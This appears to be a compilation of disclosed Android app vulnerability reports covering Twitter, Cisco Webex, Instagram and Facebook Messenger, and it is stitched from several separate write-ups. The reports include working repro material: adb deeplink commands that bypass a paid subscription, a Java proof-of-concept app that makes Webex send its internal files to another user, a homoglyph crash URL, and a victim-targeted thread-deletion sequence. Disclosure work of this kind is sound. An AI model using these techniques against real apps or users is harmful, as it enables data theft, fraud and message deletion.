Twitter recently launched Twitter Blue for Android users, allowing them to change the app icon and undo tweets at any time. Twitter Android’s version number is 9.76.0-release.0 has implemented some deeplinks for Twitter subscription to perform direct action, and some of those deeplinks are not being validated or don’t have custom permissions set if the user has a subscription or not, so it is possible to use the change icon, custom navigation, and early access features without a subscription using the below deeplinks:
extras deeplink gives access to change icon and change custom navigation and early_access deeplink gives access to features like undo tweets with custom timing.
Steps To Reproduce:
Launch below deeplink using adb to access app change flow :
adb shell am start -d "twitter://subscriptions/settings/extras"
Launch below deeplink using adb to access undo tweet feature:
adb shell am start -d "twitter://subscriptions/settings/early_access"
A vulnerability in Cisco Webex Teams Mobile (Android) application could allow a local attacker to access to non-sensitive information from an authenticated Webex Teams Mobile user.
The vulnerability is due to improper access handling in the affected software. An attacker could exploit this vulnerability by leveraging the improper access handling through a 3rd party application on an affected device. A successful exploit could allow the attacker to share non-sensitive information to any Webex Spaces the authenticated Webex Teams Mobile (Android) user has access.
Affected Version: This vulnerability affected Cisco Webex Teams Mobile (Android) releases earlier than Release 41.5.1.
The Cisco PSIRT has assigned this bug the following CVSS version 3.1 score. The Base CVSS score as of the time of evaluation is 3.3
Webex teams app has exported com.webex.teams.crosslaunch.message activity and it has associated with sharing fragment to share content with space or one2one using some parameters and action like android.intent.extra.STREAM and android.intent.action.SEND.
So any third-party app could have used those params to perform sharing content because app was failed to validate path and file before sharing content for permission.
Step to reproduce:
Create android app using below code snippet:
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
StrictMode.setVmPolicy(builder.build());
Uri uri = Uri.parse("file:///data/data/com.cisco.wx2.android/shared_prefs/com.cisco.wx2.android_preferences.xml");
Intent intent = new Intent("android.intent.action.SEND");
intent.setClassName("com.cisco.wx2.android", "com.webex.teams.crosslaunch.message");
intent.putExtra("android.intent.extra.STREAM", uri);
intent.setType("");
startActivity(intent);
}
}
Once created run this app on the device where webex teams installed.
Run the created app then it will open Webex Teams app with Messaging window to select target, now select target user, here app will attach com.cisco.wx2.android_preferences.xml file to be send.
Click on send button, it will send attached internal file to target user, this also allows access to data/data/com.cisco.wx2.android/* so all files in apps data including databases could be steal.
Note: This vulnerability requires a user to be logged into the Teams app and only non-sensitive info (some app, OS settings, and cached images) can be shared to other Webex spaces. All sensitive information is encrypted, So no CVE was assigned.
Instagram for android does not handle some CYRILLIC letters like U+043E : CYRILLIC SMALL LETTER O so if we create hostname using Cyrillic small letter о like the it could crash instagram:
http://gооgle.com/
copy above url and post this url in instagram profile or send it to user in chat .
Facebook Messenger for Android reuses the Thread ID when invoked via deeplink which could have led attacker to produce indirect thread deletion vulnerability.
This can lead to some confusing behaviour on the user-side, one example being: The user has a 1:1 with the attacker. The attacker then forces the user to create a new Group Chat with the same Thread ID that is not functional. If the user deletes the chat, the original chat with the attacker also disappears.
So attacker could use this method to delete thread between victim and his friend as well as delete chats from victims messenger as victim not able to left duplicate group thread so he has only option to delete conversation.
Deeplink used : fb-messenger://groupthreadfbid/%sFor automatic redirection using webpage :
Repro steps :
Messenger App version (Android) : 274.0.0.18.120
create webpage with script (replace userID with your userID) , host it:
1. Send Crafted webpage link created from script to user with whom you previously interacted.
2. On victims phone click on that link, it will open blank page and redirect back to thread
3. Send message to victim or when victim close app and reopen, duplicate thread id will be created between you and victim in victims phone.
4. Now if victim sends a message then it will shows in both thread.
5. Victim goes to duplicate thread(group thread) and tab on members and tab on admin, here he can see No admin.
6. Now if he try to left that group, he will get error so victim have only one option left with him that delete duplicate thread which is group thread.
7. Once victim Deletes duplicate thread by selecting “delete conversation” and then original thread also got deleted, this deletion is permanent as from thread would not visible in web after deletion.
Timeline:
27/07/2020: Report submitted.
29/07/2020: FB managed to reproduce.
03/08/2020: Triaged
03/09/2020: Fixed
10/09/2020: Bounty
POC:
Facebook Messenger for android indirect thread deletion vulnerability.
Facebook Messenger Rooms have feature to share room link to other apps when room gets created and it was vulnerable to ephemeral ( disposable ) message, Using 3350161661730468 doc id & “sendMessage” fb api caller sends a room link to other user when we select “Messenger”, Its create an offline thread.,
If we change in “id” value to victim’s user id, “message” value to any text & change “offline_threading_id” to any random number then victim gets a message notification of message and thread popup window open at his end and shows message sent by attacker but if he refresh or goto “Show in Messenger” then message got disappeared.
Summary: This could have let a malicious user spoof the URL bar of multiple Facebook Android apps by navigating to a different domain on the original tab after a new tab had been opened using the setInterval method.
